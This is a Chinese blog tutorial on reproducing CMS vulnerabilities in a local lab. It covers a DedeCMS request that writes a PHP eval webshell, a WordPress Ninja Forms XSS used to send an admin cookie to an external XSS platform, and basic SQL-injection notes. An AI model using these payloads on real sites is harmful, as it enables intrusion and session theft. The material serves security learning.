漏洞复现

最新推荐文章于 2024-06-18 14:20:54 发布
最新推荐文章于 2024-06-18 14:20:54 发布
阅读量5.6k 收藏 16
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44813849/article/details/96486510
版权

CMS漏洞复现

CMS是"Content Management System"的缩写,意为"内容管理系统"。 网站的开发者为了方便,制作了不同种类的CMS,可以加快网站开发的速度和减少开发的成本。
常见cms
在这里插入图片描述环境搭建
CMS官网CMS
网站源码下载源码
下载好后放到本地WWW目录下,然后开启PHPstudy,在浏览器访问
在这里插入图片描述点击我已阅读并继续。然后是环境检测,保存默认即可
在这里插入图片描述接下来是参数配置,需要设置的只有数据库密码,把自己的密码填上去就行了
在这里插入图片描述然后就把环境搭好了
在这里插入图片描述漏洞复现
由于此漏洞属于后台漏洞,所以我们要先登陆到后台,默认账号和密码都是admin。DeDeCMS默认后台路径是/uploads/dede,正常情况下,一个网站的后台路径肯定会被管理员更改,现在我们只做测试用,所以直接登陆。
tpl.php里面有代码执行漏洞,下面我们来找到tpl.php中存在漏洞的地方,我们再去tpl.php里看一下,发现action的参数有很多,比del,upoladok,edit,upload等等,但只有传入upload的时候页面才会回显正常,而其他的都会显示token异常,所以只能通过action=upload来获取token,查看页面源代码
在这里插入图片描述然后访问http://127.0.0.1/DedeCMS-V5.7-UTF8-SP2/uploads/dede/tpl.php?action=upload
查看源代码,看到一个token值
在这里插入图片描述
所以构造payload如下
域名+/tpl.php?action=savetagfile&token=&filename=abc.lib.php&content=<?php @eval($_POST['xxx'])?>
发现成功写入
在这里插入图片描述然后可以用中国蚁剑来打开自己或别人的文件并操作。具体的可以搜一下教程。

wopress

在这里插入图片描述先在官网上下载一个WordPress,网址:https://cn.wordpress.org/download/releases/
再下载一个对应版本的插件:网址https://downloads.wordpress.org/plugin/ninja-forms.3.3.17.zip
下载完后要把插件解压到/wp-content/plugins目录下,里面存放的都是wp的插件。
然后启动PHPstudy访问WordPress网站
网站:127.0.0.1/wordpress/wp-admin/
需要自己添加一个数据库来存放数据,使用命令CREATE DATABASE 数据库名;
在这里插入图片描述在这里插入图片描述然后访问这个网址http://127.0.0.1/wp-admin/edit.php?post_status=trash&post_type=nf_sub&form_id=1">&nf_form_filter&paged=1
然后会有一个弹窗
在这里插入图片描述然后登录到xss后台(没有的可以注册一个)
http://www.l31.cc/index.php
获取管理员的cookie来进行登陆了。操作如下
创建一个新项目,名称和描述随便写
在这里插入图片描述这时候可能会有一个弹窗里面有一个源代码,然后将以下内容复制下来
在这里插入图片描述
替换掉WordPress网站中的
<script>alert(/POC3/);</script>
然后再查看项目列表
在这里插入图片描述查看xss看到里面的cookie值
在这里插入图片描述XSS获取cookie进行免密登陆。

SQL注入

information_schema
-tables
– table_name tables表中的字段名,存放着其他数据库中的表的名字
-columns
–columns_name tables表中的字段名,存放着其他数据库中的表的名字
– table_schema 指定数据库,
database() mysql下的函数,表示当前数据库名
information_schema.tables
concat(table_name) from information_schema.tables where table_schema=database(); ‘security’

Lstop.
关注
  • 3
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反序列化漏洞漏洞复现
来日可期的博客
09-05 3402
反序列化漏洞是指应用程序在对已经序列化的数据进行反序列化时,由于缺少必要的验证或过滤,导致恶意数据被成功地反序列化为对象并被执行。攻击者可以构造恶意数据来利用这个漏洞,攻击方式通常是通过网络等传输渠道向目标应用程序发送序列化数据,使得应用程序在反序列化时执行了攻击者所构造的恶意代码,进而导致应用程序受到攻击。
【网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细)
2401_84264010的博客
05-08 1195
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
常见逻辑漏洞复现合集(下)
Y_main的博客
06-18 655
测试漏洞:越权访问漏洞(Insecure Direct Object References,IDOR)指的是应用程序在验证用户对资源或功能的访问权限时出现的漏洞。具体来说,这种漏洞允许攻击者直接访问应用程序中的对象(例如文件、数据库记录、URL等),而无需经过适当的身份验证或授权检查。越权漏洞一般又分为垂直越权漏洞和水平越权漏洞。本文中的漏洞为水平越权漏洞。水平越权是指攻击者通过利用系统或应用程序中的逻辑错误,以获取其他用户相同权限级别下的资源或执行操作的漏洞
漏洞复现之CVE-2017-12615
Blood_Pupil的博客
03-16 3117
利用方式 MSDN All files on an NTFS volume consist of at least one stream - the main stream – this is the normal, viewable file in which data is stored. The full name of a stream is of the form below. ...
复现XSS漏洞及分析
qq_61739597的博客
09-01 2887
跨站脚本攻击XSS(Cross Site Scripting),为区别层叠样式表(Cascading Style Sheets, CSS),所以改写为XSS。
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)
热门推荐
m0_67844671的博客
09-12 1万+
Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细);Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。AJP(Apache JServ Protocol)是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。WEB服务器通过 TCP连接
FastJson 漏洞复现
来日可期的博客
09-11 2067
FastJson 1.2.24 反序列化导致任意命令执行漏洞,Fastjson 1.2.47 远程命令执行漏洞
weblogic 漏洞复现
03-11 7254
cd vulhub/weblogic/CVE-2018-2894/ //进入对应得目录 sudo service docker start //启动docker服务 docker-compose up -d //启动 docker-compose stop //测试完毕后停止服务 docker-compose down //移除容器 Weblogic 任意文件上传漏洞(CVE-2018-2894) 漏洞成因:WebLogic 管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限
Apache HTTPD 漏洞复现
来日可期的博客
09-07 2335
Apache HTTPD 多后缀解析漏洞,Apache HTTPD 换行解析漏洞-CVE-2017-15715,Apache HTTP Server_2.4.49 路径遍历和文件泄露漏洞-CVE-2021-41773,Apache HTTP 服务器 2.4.50 中的路径遍历和文件泄露漏洞-CVE-2021-42013漏洞复现合集
Wordpress漏洞复现
weixin_52194536的博客
09-10 8900
cms漏洞
Apache漏洞复现
人若有志,就不会在半坡停止。
10-13 1559
的路径穿越符,当检测到路径中存在%字符时,如果紧跟的2个字符是十六进制字符,就会进行url解码,将其转换成标准字符,如%2e->.,转换完成后会判断是否存在…如果路径中存在%2e./形式,就会检测到,但是出现.%2e/这种形式时,就不会检测到,原因是在遍历到第一个.字符时,此时检测到后面的两个字符是%2而不是./,就不会把它当作路径穿越符处理,因此可以使用.%2e/或者%2e%2e绕过对路径穿越符的检测实现目录遍历。复制路径进行访问,成功查看到phpinfo的信息,说明上传的文件被执行。
【创新未发表】Matlab实现遗传算法GA-RF实现风电预测算法研究.rar
08-02
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
蚁群算法(培训).pdf
08-02
蚁群算法(培训).pdf
【中科院1区】Matlab实现花朵授粉优化算法FPA-RF锂电池健康状态估计算法研究.rar
最新发布
08-02
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
swagger漏洞复现
06-29
Swagger 是一个流行的 API 设计和文档生成工具,但像任何软件一样,它可能存在安全漏洞复现 Swagger 漏洞通常涉及到以下几个步骤: 1. **漏洞识别**:首先需要找到 Swagger 安全漏洞的相关报告或文档,这些可能来自安全研究员的博客、CVE(Common Vulnerabilities and Exposures)公告或其他安全社区。 2. **漏洞利用**:理解漏洞的具体细节,这可能涉及对 Swagger 客户端库、服务器端实现或其配置文件的特定攻击路径。有时候,可能需要构造特定的请求或提供特定的数据来触发漏洞。 3. **环境准备**:在本地环境中设置一个 Swagger 服务,并确保配置和版本与已知漏洞匹配,以便进行复现。 4. **复现过程**:使用工具如 Postman、curl 或自动化测试框架发送特定的请求,监控响应以确认漏洞是否被成功利用。 5. **证据收集**:记录下漏洞利用过程中的请求、响应以及任何敏感信息的泄露,作为漏洞复现的证据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值